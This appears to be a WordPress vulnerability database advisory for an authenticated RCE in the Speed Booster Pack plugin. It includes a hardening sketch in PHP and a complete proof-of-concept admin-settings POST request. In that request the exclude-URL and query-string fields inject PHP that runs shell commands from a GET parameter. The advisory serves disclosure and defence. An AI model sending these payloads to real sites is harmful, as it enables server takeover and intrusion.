WordPress Plugin Vulnerabilities
Speed Booster Pack 4.2.0-beta - Authenticated (admin+) RCE
Description
The plugin did not validate its caching_exclude_urls and caching_include_query_strings settings before outputting them in a PHP file, which could lead to remote code execution (RCE).
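The pattern described above, as an added example that is not the plugin's own code: a constructed sketch in which a setting is written into a generated PHP file, first by plain string concatenation and then with allowlist validation plus var_export(). All function and variable names are hypothetical, and the sample input is constructed.

```php
<?php
// Added example: constructed sketch, not Speed Booster Pack's source.
// All function and variable names here are hypothetical.

// Unsafe pattern: the setting is pasted between quotes in generated PHP,
// so a value containing a quote ends the string literal early and the
// rest of the value is parsed as PHP code.
function render_settings_unsafe(string $exclude_urls): string {
    return "<?php\n\$exclude_urls = '" . $exclude_urls . "';\n";
}

// Hardened pattern, step 1: validate each line against an allowlist.
function sanitize_url_lines(string $raw): array {
    $clean = [];
    foreach (preg_split('/\R/', $raw) ?: [] as $line) {
        $line = trim($line);
        if ($line === '') {
            continue;
        }
        // Allow only characters expected in a URL path or query-string name.
        if (!preg_match('~^[A-Za-z0-9/_.\-?=&%*]+$~', $line)) {
            continue; // drop the line instead of trying to repair it
        }
        $clean[] = $line;
    }
    return $clean;
}

// Hardened pattern, step 2: let var_export() build the PHP literal, so
// quotes and backslashes are escaped even if validation is later loosened.
function render_settings_safe(string $raw): string {
    $urls = sanitize_url_lines($raw);
    return "<?php\n\$exclude_urls = " . var_export($urls, true) . ";\n";
}

// Constructed sample input: one ordinary path and one containing a quote.
$sample = "/cart/\n/o'brien/";

// The unsafe output is no longer a single string literal.
echo render_settings_unsafe($sample), "\n";

// The safe output keeps only the line that passed the allowlist.
echo render_settings_safe($sample), "\n";

// var_export() on its own keeps the quote inside the literal.
echo var_export("/o'brien/", true), "\n";
```

Storing such settings as data (a database option or a JSON file read at runtime) instead of generated PHP removes the injection surface altogether.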
Proof of Concept
PoC | Authenticated RCE | Caching > Exclude URLs / Cached query strings:

POST /wp-admin/admin.php?page=sbp-settings HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data; boundary=---------------------------302485341940537720723165689794
Content-Length: 12229

-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="csf_transient[section]"

2
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="csf_options_noncesbp_options"

29dd57f6e3
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/admin.php?page=sbp-settings
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[module_caching]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[caching_expiry]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[caching_separate_mobile]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[caching_warmup_after_clear]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[caching_exclude_urls]"

' );}`$_GET[m0ze]`;/*
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[caching_exclude_cookies]"

m0ze
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[caching_include_query_strings]"

' );}system($_GET[m0ze]);/*
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cdn_url]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cdn_includes]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cdn_excludes]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cloudflare_enable]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cloudflare_api]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cloudflare_email]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cloudflare_zone]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cf_rocket_loader_enable]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cf_dev_mode_enable]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cf_css_minify_enable]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cf_html_minify_enable]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cf_js_minify_enable]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cf_apo_enable]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cf_apo_device_type]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[cf_browser_cache_ttl]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[sucuri_enable]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[sucuri_api]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[sucuri_secret]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[module_css]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[enable_criticalcss]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[criticalcss_default]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_front_page]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_home]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_single]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_page]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_category]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_tag]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[criticalcss_codes][is_archive]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[remove_criticalcss]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[css_inline]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[css_minify]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[css_exclude]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[module_assets]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[minify_html]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[optimize_gfonts]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[lazyload]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[lazyload_exclude]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[js_optimize]"

off
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[js_exclude]"

js/jquery/jquery.js js/jquery/jquery.min.js
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[js_include]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[move_to_footer]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[move_to_footer_exclude]"

js/jquery/jquery.js js/jquery/jquery.min.js
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[preboost][preboost_enable]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[preboost][preboost_include]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[module_special]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[localize_tracking_scripts]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="___sbp_options[custom_codes][0][custom_codes_item]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="___sbp_options[custom_codes][0][custom_codes_place]"

footer
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="___sbp_options[custom_codes][0][custom_codes_method]"

normal
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[jetpack_dequeue_devicepx]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[woocommerce_disable_cart_fragments]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[woocommerce_optimize_nonwc_pages]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[woocommerce_disable_password_meter]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[pagespeed_tricker]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[module_tweaks]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[instant_page]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[trim_query_strings]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[disable_self_pingbacks]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[dequeue_emoji_scripts]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[disable_post_embeds]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[dequeue_dashicons]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[dequeue_block_library]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[heartbeat_settings]"

enabled
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[post_revisions]"

99
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[autosave_interval]"

1
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[dequeue_comment_reply_script]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_shortlinks]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_adjacent_posts_links]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_wlw]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_rsd]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_rest_api_links]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_feed_links]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[declutter_head][declutter_wp_version]"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="csf_import_data"


-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="sbp_options[enable_external_notices]"

0
-----------------------------302485341940537720723165689794
Content-Disposition: form-data; name="csf_transient[save]"

Saving...
-----------------------------302485341940537720723165689794--
Affects Plugins
References
Classification
Type
RCE
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
m0ze
Submitter
m0ze
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-07-05 (about 2 years ago)
Added
2021-07-05 (about 2 years ago)
Last Updated
2021-08-10 (about 2 years ago)